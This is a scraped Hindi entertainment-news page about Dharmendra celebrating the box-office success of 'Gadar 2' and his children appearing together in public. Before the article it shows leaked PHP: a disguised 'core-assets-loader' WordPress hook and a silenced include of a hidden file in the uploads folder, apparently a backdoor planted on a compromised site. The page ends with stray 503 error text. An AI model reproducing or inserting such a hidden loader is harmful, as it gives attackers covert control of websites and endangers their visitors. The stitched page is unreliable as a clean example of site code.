add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बेटे ‘गदर 2’ सुपरहिट होने पर खुशी से फूल नहीं समा रहे Dharmedra, किया पोस्ट तो ईशा देओल ने ऐसे किया रिएक्ट – SOCH INDIA
Menu

देश
बेटे ‘गदर 2’ सुपरहिट होने पर खुशी से फूल नहीं समा रहे Dharmedra, किया पोस्ट तो ईशा देओल ने ऐसे किया रिएक्ट

nobanner

‘गदर 2’ बॉक्स ऑफिस पर तहलका मचा रही है. पूरे देश में इस फिल्म के लिए गजब की दीवानगी देखने को मिल रही है. इसी दौरान धर्मेंद्र का भी पूरा परिवार इस फिल्म के बहाने एक होता नजर आ रहा है. हाल ही में फिल्म के प्रमोशन इवेंट में सनी देओल और बॉबी देओल के साथ ईशा और अहाना को पहली बार देखा गया. जिसके बाद अपने परिवार को एक होता देख धर्मेंद्र की खुशी का ठिकाना नहीं है. किसी ने नहीं सोचा था 22 साल पुरानी एक फिल्म का सीक्वल सुपरहिट तो साबित होगा ही साथ ही एक परिवार को भी एक कर जाएगा. अब इसी खुशी में हाल ही में धर्मेंद्र ने एक पिक्चर शेयर की है और अपनी खुशी जाहिर की.

बेटे की फिल्म की सक्सेस पर धर्मेंद्र ने शेयर किया खास नोट
धर्मेंद्र फिलहाल बेटे की सक्सेस से काफी खुश हैं. उनका पूरा परिवार फिल्म के सेलिब्रेशन में लगा हुआ है. अब हाल ही में उन्होंने एक पोस्ट शेयर कर इसकी खुशी फैंस के साथ जाहिर की है. जिसमें स्टार बहुत सारे खूबसूरत फूलों के साथ गदर 2 की सक्सेस सेलिब्रेट कर रहे हैं. इसके कैप्शन में धर्मेंद्र ने लिखा, ‘दोस्तों, आप सभी ने गदर 2 को जो प्यारा रिस्पांस दिया. उसके लिए आप सभी को प्यार. आपके आशिर्वाद और शुभकामनाओं ने इस फिल्म को ब्लॉकबस्टर बना दिया है.’

बच्चों को साथ देख पापा धर्मेंद्र हुए भावुक
हाल ही में गदर 2 की प्रमोशन के दौरान ईशा देओल, सनी देओल, बॉबी देओल और अहाना देओल को एक-दूसरे को गले लगाते हुए देखा गया था. इसका वीडियो इंस्टाग्राम पर एक फैन पेज द्वारा शेयर किया गया था. जिसे धर्मेंद्र ने भी अपनी इंस्टा स्टोरी में शेयर किया था. हालांकि इसमें उन्होंने कोई कैप्शन नहीं लिखा, लेकिन इससे ही उनके रिएक्शन का अंदाजा लगाया जा सकता है. ये पहली बार था जब धर्मेंद्र की दोनों पत्नीयों प्रकाश कौर और हेमा मालिनी के बच्चे किसी सार्वजनिक मंच पर साथ नजर आए हों.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.